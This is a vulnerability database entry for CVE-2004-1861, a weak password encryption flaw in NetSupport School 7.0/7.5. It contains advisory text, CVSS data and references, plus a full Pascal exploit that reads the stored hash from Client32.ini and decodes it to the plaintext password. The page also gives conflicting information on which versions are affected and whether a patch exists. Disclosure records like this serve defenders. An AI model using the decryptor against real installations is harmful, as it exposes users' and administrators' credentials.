CVE-2004-1861
CVSS 4.6
Published: 2004-03-25 00:00:00
Last revised: 2016-10-17 23:01:54

[Original] Invision NetSupport School Pro uses a weak encryption algorithm to encrypt passwords, which allows local users to obtain passwords.


[CNNVD] NetSupport School Weak Password Encryption Vulnerability (CNNVD-200403-109)

        
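        NetSupport School is a networked classroom solution.
        The encryption mechanism in NetSupport School is not strong enough; a local attacker can exploit this vulnerability to obtain user and administrator passwords.
        Because the application's encryption mechanism is weak, an attacker can decrypt the stored passwords to plaintext.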
        

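- CVSS (Base Score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions for exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]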

- CPE (Affected Platforms and Products)

cpe:/a:netsupport:netsupport_school:7.5
cpe:/a:netsupport:netsupport_school:7.0
cpe:/a:netsupport:netsupport_school:7.0_1

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1861
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1861
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-109
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=108032304932321&w=2
(UNKNOWN)  BUGTRAQ  20040326 NetSupport School Pro: Password Encryption Weaknesses
http://www.securityfocus.com/bid/9981
(VENDOR_ADVISORY)  BID  9981
http://xforce.iss.net/xforce/xfdb/15621
(VENDOR_ADVISORY)  XF  netsupportschoolpro-weak-encryption(15621)

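- Vulnerability Information

NetSupport School Weak Password Encryption Vulnerability
Medium risk  Design error
2004-03-25 00:00:00 2005-10-20 00:00:00
Local
        
        NetSupport School is a networked classroom solution.
        The encryption mechanism in NetSupport School is not strong enough; a local attacker can exploit this vulnerability to obtain user and administrator passwords.
        Because the application's encryption mechanism is weak, an attacker can decrypt the stored passwords to plaintext.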
        

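- Advisories and Patches

        Vendor patch:
        NetSupport
        ----------
        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version: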
        
        http://www.netsupport-inc.com/nss/netsupport_school_overview.htm

- Vulnerability Information (23882)

NetSupport School 7.0/7.5 Weak Password Encryption Vulnerability (EDBID:23882)
linux local
2004-03-26 Verified
0 spiffomatic 64
N/A
source: http://www.securityfocus.com/bid/9981/info

NetSupport School is prone to a password-encryption vulnerability because the application fails to protect passwords with a sufficiently effective encryption scheme. 

Exploiting this issue may allow an attacker to access user and administrator passwords for the affected application.

program name;
uses crt;
var i,j,length,x,y,crazy:integer;
    passfile:text;
    line:string;
    password,p:array [1..100] of char;
    known,convert:array [1..26,1..3] of char;
    ch,tempx,tempy,key:char;

procedure conv;
begin
convert[1,1]:='E';
convert[1,2]:='M';
convert[1,3]:='A';
for i:=2 to 26 do begin
    if convert[i-1,2]='P' then begin
       convert[i,1]:=chr(ord(convert[i-1,1])+1);
       convert[i,2]:='A';
    end
    else begin
         convert[i,1]:=convert[i-1,1];
         convert[i,2]:=chr(ord(convert[i-1,2])+1);
    end;
    convert[i,3]:=chr(ord(convert[i-1,3])+1);
end;
end;

procedure hex(a,b:char; num:integer);
begin
if num>0 then begin
for i:=1 to num do begin
    if b='P' then begin
       b:='A';
       a:=chr(ord(a)+1);
    end else inc(b);
end;
end;
if num<0 then begin
for i:=-1 downto num do begin
    if b='A' then begin
       b:='P';
       a:=chr(ord(a)-1);
    end else dec(b);
end;
end;
tempx:=a;
tempy:=b;
end;

function compare(a,b:char):char;
begin
for i:=1 to 26 do begin
if (a=convert[i,1])and(b=convert[i,2]) then compare:=chr(i+64);
end;
end;

function diff(a,b,c,d:char):integer;
var num1,num2,num3:integer;
begin
num1:=ord(a)*16+ord(b);
num2:=ord(c)*16+ord(d);
num2:=num2;
diff:=num2-num1;
end;


Begin
{get the hash from client32.ini}
clrscr;
Writeln(' _________________________________________________________');
Writeln('|NetSupport School Pro Password decryptor                 |');
Writeln('|Credits goto: Drexel University, Harry Hoffman, Mr. Flynn|');
Writeln('|and my wonderful fiance Halley                           |');
Writeln(' ---------------------------------------------------------');
Writeln('');
   assign (passfile,'C:\Progra~1\NetSup~1\Client32.ini');
   reset (passfile);
   i:=0;
   while not eof(passfile) do
   begin
        line:='';
        while not EoLn(passfile) do
        begin
             Read(passfile, ch);
             line:=line+ch;
             if line='SecurityKey=' then begin
                while not eoln(passfile) do
                begin
                  inc(i);
                  read(passfile,ch);
                  password[i]:=ch;
                end;
                length:=i;
             end;
        end;
        readln(passfile,line);
   end;
   write('Hash: ');
   for i:=1 to length do write(password[i]);
writeln('');
{decrypt the hash}
conv;
known[1,1]:='E';
known[1,2]:='M';
known[2,1]:='9';
known[2,2]:='O';
known[3,1]:='>';
known[3,2]:='A';
known[4,1]:='B';
known[4,2]:='C';
known[5,1]:='F';
known[5,2]:='E';
known[6,1]:=':';
known[6,2]:='G';
known[7,1]:='>';
known[7,2]:='I';
known[8,1]:='B';
known[8,2]:='K';
known[9,1]:='F';
known[9,2]:='M';
known[10,1]:=':';
known[10,2]:='O';
known[11,1]:='?';
known[11,2]:='A';
known[12,1]:='C';
known[12,2]:='C';
known[13,1]:='G';
known[13,2]:='E';
known[14,1]:=';';
known[14,2]:='G';
known[15,1]:='?';
known[15,2]:='I';
{get the first char}
for i:=1 to round(length/2) do p[i]:=chr(65);
for x:=1 to round(length/2) do begin
    crazy:=0;
    crazy:=-(round(length/2))+x;
    for y:=1 to round(length/2) do crazy:=crazy-(ord(p[y])-65);
    hex(password[x*2-1],password[x*2],crazy);
    p[x]:=chr(diff(known[x,1],known[x,2],tempx,tempy)+65);
end;
writeln('');
write('Password: ');
for i:=1 to round(length/2) do begin
    write(p[i]);
end;
readkey;

end.
		

- Vulnerability Information

16733
NetSupport School Pro Password Storage Encryption Weakness

- Vulnerability Description

- Timeline

2004-03-26 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

NetSupport School Weak Password Encryption Vulnerability
Design Error 9981
No Yes
2004-03-26 12:00:00 2007-09-10 09:41:00
Discovery of this issue is credited to "spiffomatic 64" <spiffomatic64@hotmail.com>.

- Affected Versions

NetSupport School 7.5
NetSupport School 7.0 1
NetSupport School 7.0
NetSupport School 7.50f1

- Unaffected Versions

NetSupport School 7.50f1

- Discussion

NetSupport School is prone to a password-encryption vulnerability because the application fails to protect passwords with a sufficiently effective encryption scheme.

Exploiting this issue may allow an attacker to access user and administrator passwords for the affected application.

- Exploit

The following exploit has been provided:

- Solution

The vendor has released updates to address this issue. Please contact the vendor for details on obtaining and applying the appropriate updates.

- Related References

 

 
